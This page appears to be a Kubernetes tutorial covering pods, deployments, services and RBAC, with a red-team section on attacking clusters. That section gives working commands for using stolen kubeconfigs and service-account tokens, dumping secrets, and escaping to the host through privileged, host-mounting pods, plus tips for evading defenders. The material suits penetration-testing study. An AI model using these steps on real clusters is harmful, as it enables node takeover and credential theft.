Kubernetes

What is Kubernetes?

Kubernetes allows you to orchestrate the configuration and deployment of containers across multiple hosts. It's also an integral part of many microservice setups.

Containers are useful for a single application component, but deploying containers individually can get tedious and error-prone, especially at scale. If you want to deploy an entire application stack to a cluster of servers, Kubernetes can manage the entire thing for you.

For instance, let's say your application has a webserver running NGINX, a DB server running MariaDB, and a cache server running Redis. Deploying with just containers is certainly doable, but we should work smarter, not harder! With Kubernetes you can run a single command to spin up the entire stack, upgrade each component, provide load balancing, scale the number of hosts dynamically, and more.

What Goes Into a Kubernetes Cluster?

First things first, we need machines for our containers. Each node in our cluster hosts one or more groups of containers, and each group of containers that is deployed and scheduled together is called a pod.

When initializing the pod, we need to consider the startup costs of the pod backend and the network namespace that will connect our containers to everything else. The naive approach would be to set up the pod and all of its networking again from zero whenever all of the containers die. However, that's less than ideal - we're wasting cycles unnecessarily. Instead, Kubernetes automatically creates a pause container in every pod, which does nothing but sleep forever while holding the pod's namespaces open, so the pod itself survives even if every other container goes down.

The rest of the core pod mechanics are pretty straightforward. Each container will share the same network namespace and have the same IP address (beware port collisions - two containers in the same pod can't bind the same port!). When it comes to storage, there are volumes just like we'd use for standalone containers.

In order to create a pod (along with all of the concepts that follow), we need to write some YAML. For a very basic example, this is how we would create an NGINX container (credit to the Kubernetes docs):

apiVersion: v1
kind: Pod
metadata:
  name: nginx
spec:
  containers:
  - name: nginx
    image: nginx:1.14.2
    ports:
    - containerPort: 80

To perform the actual creation, we'd save the YAML to a file and then apply this pod declaration with the kubectl binary:

kubectl apply -f ./nginx.yaml
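
To confirm the pod actually came up:

# Check the pod's status (should be Running once the image is pulled)
kubectl get pod nginx

# Inspect details and events if something went wrong
kubectl describe pod nginx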

How does this pod even get created? Magic has been impossible for a while now, so we need a controller (the control plane) to create that illusion. Behind the scenes, kubectl is making HTTP requests to the Kubernetes API server, which records the desired state. The scheduler then selects a node that can handle the new pod, and that node's "agent" (the kubelet) is responsible for actually creating the containers.
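
You can watch this happen yourself by turning up kubectl's log verbosity, which prints the HTTP calls it makes under the hood:

# -v=6 logs each request kubectl sends to the API server
kubectl get pods -v=6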

TIP

Kubernetes is a declarative system, not an imperative one. If we want three NGINX containers, then Kubernetes will ensure that there are three containers, with the controller automatically handling pod/node failures when they appear.

Now, if we create just individual pods, we're missing out on a lot of the benefits of Kubernetes, such as automatic failover and scaling. To that end, we can instead create pods via a deployment. This is generally what you'll see for an actual application.

If we were to migrate the NGINX pod to a deployment, here's what it'd look like (credit to the Kubernetes docs). Take note of the spec.replicas field:

apiVersion: apps/v1
kind: Deployment
metadata:
  name: nginx-deployment
  labels:
    app: nginx
spec:
  replicas: 3
  selector:
    matchLabels:
      app: nginx
  template:
    metadata:
      labels:
        app: nginx
    spec:
      containers:
      - name: nginx
        image: nginx:1.14.2
        ports:
        - containerPort: 80
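
After applying this, the declarative behavior from the earlier tip is easy to see for yourself (the pod name below is a placeholder; copy one from the get output):

# Create the deployment and list its three pods
kubectl apply -f ./nginx-deployment.yaml
kubectl get pods -l app=nginx

# Delete one pod; the controller notices and spins up a replacement
kubectl delete pod <one-of-the-nginx-pod-names>
kubectl get pods -l app=nginx --watch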

Nodes also need a way to handle network traffic. This piece is managed by kube-proxy, which proxies container traffic, configures iptables and IPVS (IP Virtual Server) rules, and so on.

Of course, none of this will be a static configuration. We may need to expand or reduce the number of pods/nodes, they'll be created and destroyed, and they may move from one host to the next. Maintaining this configuration by hand would be a nightmare for anything that has to interact with the pods as a collective. We need some kind of abstraction layer that knows where our containers currently live and can route traffic to them even if the internal configuration changes. To that end, you can expose one or more pods as a Kubernetes service, which acts as a load balancer. It will provide a single DNS name, virtual IP, and incoming/outgoing port pair for your service.

As an example, we may define a service for the Postgres database backing our web application (credit to this tutorial by DigitalOcean):

apiVersion: v1
kind: Service
metadata:
  name: postgres
  labels:
    app: postgres
spec:
  type: NodePort
  ports:
    - port: 5432
  selector:
    app: postgres

When a service is created, a DNS record is created for it. For example, this could be app.default.svc.cluster.local. The service also creates an SRV record for each named port; if we exposed port 80 under the port name 80-80, this would be _80-80._tcp.app.default.svc.cluster.local. And finally, with the right configuration (an ExternalName service), Kubernetes will also create a CNAME record for humans to navigate to.
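
You can verify these records from inside any pod in the cluster, assuming the image has nslookup or dig available (the names below match the app example above):

# Resolve the service's virtual IP
nslookup app.default.svc.cluster.local

# Look up the SRV record for the named port
dig SRV _80-80._tcp.app.default.svc.cluster.local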

Not every cluster will just contain a single deployment and service, though. You may be sharing a cluster with other teams, there may be tools monitoring for malicious containers, and so on. To provide a level of isolation, services, deployments, secrets, etc. are split into a number of namespaces. In other words, namespaces are logical "clusters" of sorts.

There are two primary built-in namespaces to know about. The first one is default, which is where resources are deployed when a different namespace isn't specified. Then there's kube-system, which is where Kubernetes' control plane components reside.
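
Working with namespaces is a matter of passing --namespace (or -n) to kubectl; the team-a name here is just an example:

# List all namespaces in the cluster
kubectl get namespaces

# Create a new namespace
kubectl create namespace team-a

# Deploy into it instead of default
kubectl apply -f ./nginx.yaml --namespace team-a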

RBAC

Kubernetes provides RBAC because giving everybody admin privileges is less-than-ideal.

There are two main objects to be aware of:

  1. A Role specifies a list of actions for specific resources, for example listing pods.
  2. A RoleBinding maps a Role to a principal (i.e. user).

Additionally, roles are scoped to a specific namespace. To grant cluster-level permissions, you'll need to use ClusterRole and ClusterRoleBinding.

Here's an example of what a Role looks like (credit to the Kubernetes docs):

apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  namespace: default
  name: pod-reader
rules:
- apiGroups: [""] # "" indicates the core API group
  resources: ["pods"]
  verbs: ["get", "watch", "list"]

And a RoleBinding that gives jane the pod-reader role in the default namespace:

apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: read-pods
  namespace: default
subjects:
- kind: User
  name: jane
  apiGroup: rbac.authorization.k8s.io
roleRef:
  kind: Role
  name: pod-reader
  apiGroup: rbac.authorization.k8s.io
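
As a sanity check, kubectl can evaluate permissions on behalf of a user (assuming the YAML above was saved to role.yaml and rolebinding.yaml, and that you're allowed to impersonate):

# Apply both objects
kubectl apply -f ./role.yaml -f ./rolebinding.yaml

# jane can read pods in the default namespace...
kubectl auth can-i get pods --as jane --namespace default

# ...but can't do anything else, like creating pods
kubectl auth can-i create pods --as jane --namespace default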

Reference: Control Plane Components

The control plane has several core components:

  1. The API server is the frontend of the control plane. You as the developer will give it deployments to run using the kubectl command, and the API server will kick off the operations required to fulfill your request.
  2. The etcd server is the cluster's key-value data store; it retains the state of every resource in the cluster.
  3. The scheduler is responsible for selecting nodes to host new pods.
  4. The controller manager runs various controller processes to handle node failure, run one-off tasks, and more. Despite being multiple logical processes, this is just a single binary.
  5. Cluster DNS is responsible for, well, managing DNS records. This component isn't strictly required, but it's highly recommended for the reasons mentioned earlier.
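
On clusters where the control plane itself runs as pods (e.g. kubeadm-based installs), you can see most of these components directly; exact names vary by distribution:

# Control plane components typically live in the kube-system namespace
kubectl get pods -n kube-system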

Service Meshes (Istio)

TODO

Write this section.

Attacking Kubernetes

This all assumes that a pod has been compromised first - for instance, the application running in the pod was compromised and yielded a shell.

The core idea is to use the pod's access to gain access to other services, attack other containers within the pod, and eventually make requests to the API server or a kubelet to:

  • Run commands in another pod
  • Start a new pod with elevated privileges/high-value resources
  • Extract secrets
  • Pivot to the cloud service provider

Prerequisite: Authentication

Starting Point: Within the Network

If you are starting from within the network, reconnaissance will probably be a lot easier. Just install the kubectl binary and either authenticate or use a stolen kubeconfig file. (This step is left as an exercise to the reader.)

Once you have the kubeconfig file, you need to set the KUBECONFIG environment variable:

# TODO: set namespace
export KUBECONFIG="/path/to/kubeconfig"
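
From there, confirm the config actually authenticates and pick a namespace to operate in (the namespace name below is a placeholder):

# Verify the stolen config works
kubectl config get-contexts
kubectl cluster-info

# Set a default namespace for subsequent commands
kubectl config set-context --current --namespace=<target-namespace>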

Obviously this is only the case if you are testing a Kubernetes deployment or application in an assumed-breach scenario (or are pivoting).

Starting Point: Inside a Pod

In order to use the Kubernetes API from within a pod, say after compromising a web application and getting a shell, you can use the pod's credentials by setting these environment variables:

export APISERVER="${KUBERNETES_SERVICE_HOST:?}:${KUBERNETES_SERVICE_PORT_HTTPS:?}"
export SERVICEACCOUNT="/var/run/secrets/kubernetes.io/serviceaccount"
export NAMESPACE="$(cat ${SERVICEACCOUNT:?}/namespace)"
export TOKEN="$(cat ${SERVICEACCOUNT:?}/token)"
export CACERT="${SERVICEACCOUNT:?}/ca.crt"

Now we can use curl or kubectl like so to access the Kubernetes API:

# NOTE: with `--cacert` supplied, `--insecure` shouldn't be necessary; it just suppresses any remaining cert errors.
alias kurl="curl --insecure --cacert ${CACERT} --header \"Authorization: Bearer ${TOKEN}\""
alias kubectl='kubectl --token=$TOKEN --server=https://$APISERVER --insecure-skip-tls-verify=true'
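
As a quick smoke test, here's what hitting the raw API looks like (assuming the service account can at least list pods in its own namespace):

# API server version information
kurl "https://${APISERVER}/version"

# List pods in the pod's own namespace
kurl "https://${APISERVER}/api/v1/namespaces/${NAMESPACE}/pods"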

TIP

I would recommend building some tooling for interacting with the Kubernetes API via curl, particularly when targeting organizations with a good security posture. Security tools may detect you attempting to place new executable files within a pod and reveal your presence very quickly.

For the sake of simplicity (read: I haven't written this tooling yet), I will use kubectl throughout this tutorial.

Reconnaissance

As a starting point, try these commands:

kubectl auth can-i --list
kubectl get secrets
kubectl get pods
kubectl get namespaces
kubectl get nodes
kubectl get services
kubectl get deployments
kubectl cluster-info

The low-hanging fruit would be excessive permissions for the account/pod you're authenticating as, as well as any secrets that may be of use elsewhere in lateral movement, e.g. access to another, more privileged service account.
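
If `get secrets` turns anything up, remember that the values are only base64-encoded, not encrypted (the secret and key names below are placeholders):

# Dump a secret's data keys
kubectl get secret <secret-name> -o yaml

# Decode a single value
kubectl get secret <secret-name> -o jsonpath='{.data.<key>}' | base64 -d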

Transferring Binaries to Pods

WARNING

Security tools may detect you attempting to place new executable files within a pod and reveal your presence very quickly.

If you are able to access or create a pod, you can transfer the binaries like so:

kubectl cp /usr/bin/kubectl attack-pod:/tmp/
kubectl cp /usr/local/bin/peirates attack-pod:/tmp/

Attack Pods

TIP

In all pod definitions, you will almost certainly have to change the metadata.namespace field to something other than the default namespace.

You should also change the following fields unless you want it to be clear to defenders that the red team has broken in:

  • metadata.name
  • metadata.namespace
  • metadata.labels.run
  • containers[0].name

If you change the pod name, you will also need to update associated shell commands to use the new name instead of attack-pod.
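
A quick way to handle all of the renaming in one pass (metrics-agent is just an example; pick something that blends into the target environment):

# Rewrite every occurrence of the default name before applying
sed -i 's/attack-pod/metrics-agent/g' ./attack-pod.yaml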

Root FS Escape

If you are able to create a pod, you can try to mount the host filesystem to escape the container to the underlying host, which may hold some goodies.

apiVersion: v1
kind: Pod
metadata:
  name: attack-pod
  namespace: default
  labels:
    run: attack-pod
spec:
  # Uncomment and specify a specific node you want to spawn on
  # nodeName: <insert-node-name-here>

  # No need to restart this pod since it should be ephemeral
  restartPolicy: Never

  # Make the host filesystem available as a volume
  volumes:
  - name: host-fs
    hostPath:
      path: /

  # Define the container
  containers:
  - image: ubuntu
    imagePullPolicy: IfNotPresent
    name: attack-pod
    # Mount the host filesystem at /host/
    volumeMounts:
      - name: host-fs
        mountPath: /host

Next, create the pod and connect to it:

# Create the pod
kubectl apply -f ./attack-pod.yaml

# Make sure it's running
kubectl get pod attack-pod

# Spawn a shell
kubectl exec --stdin --tty attack-pod -- /bin/bash

Finally, to escape the pod, simply chroot to /host/, which holds the host filesystem mount:

chroot /host/ bash
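
From the chroot you are effectively on the node, so look around. The paths below are common defaults for kubeadm-style installs and will vary by distribution:

# Kubelet credentials -- often a ticket to further API access
cat /etc/kubernetes/kubelet.conf

# Mounted volumes and secrets for every pod on this node
ls /var/lib/kubelet/pods/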

Super Privileged

This is complete overkill, but illustrates a variety of things that you should not be able to do when spinning up a pod.

apiVersion: v1
kind: Pod
metadata:
  name: attack-pod
  namespace: default
  labels:
    run: attack-pod
spec:
  # Uncomment and specify a specific node you want to spawn on
  # nodeName: <insert-node-name-here>

  # No need to restart this pod since it should be ephemeral
  restartPolicy: Never

  # Use the host's IPC namespace
  # https://www.man7.org/linux/man-pages/man7/ipc_namespaces.7.html
  hostIPC: true

  # Use the host's network namespace
  # https://www.man7.org/linux/man-pages/man7/network_namespaces.7.html
  hostNetwork: true

  # Use the host's PID namespace
  # https://man7.org/linux/man-pages/man7/pid_namespaces.7.html
  hostPID: true

  # Make the host filesystem available as a volume
  volumes:
  - name: host-volume
    hostPath:
      path: /

  # Define the container
  containers:
  - image: ubuntu
    # Adjust the duration as needed -- keep the pod alive only as long as you need it
    command:
      - "sleep"
      - "3600"
    imagePullPolicy: IfNotPresent
    name: attack-pod
    # Mount the host filesystem at /host/
    volumeMounts:
    - mountPath: /host
      name: host-volume
    # Run as a privileged pod
    securityContext:
      # Controls whether a process can gain more privileges than its parent process
      allowPrivilegeEscalation: true
      # A privileged container turns off the security features that isolate the container from the host
      privileged: true
      # Run as root (or any other user)
      runAsUser: 0
      # Add any capabilities you need
      # https://man7.org/linux/man-pages/man7/capabilities.7.html
      # capabilities:
      #   add: ["NET_ADMIN", "SYS_ADMIN"]


Defending Kubernetes

For a general reference, check out the Kubernetes Hardening Guide. Even the introduction provides some good high-level guidance.

The most important thing is to update your cluster frequently! Development is very active, and new releases come out often. Support for a given minor version only lasts 12 months (it used to be 9!), so if the cluster is older than that, there may not even be any security patches available.
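
To check what the cluster and its nodes are actually running (and compare against the currently supported releases):

# Client and API server versions
kubectl version

# Kubelet version for every node (see the VERSION column)
kubectl get nodes -o wide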
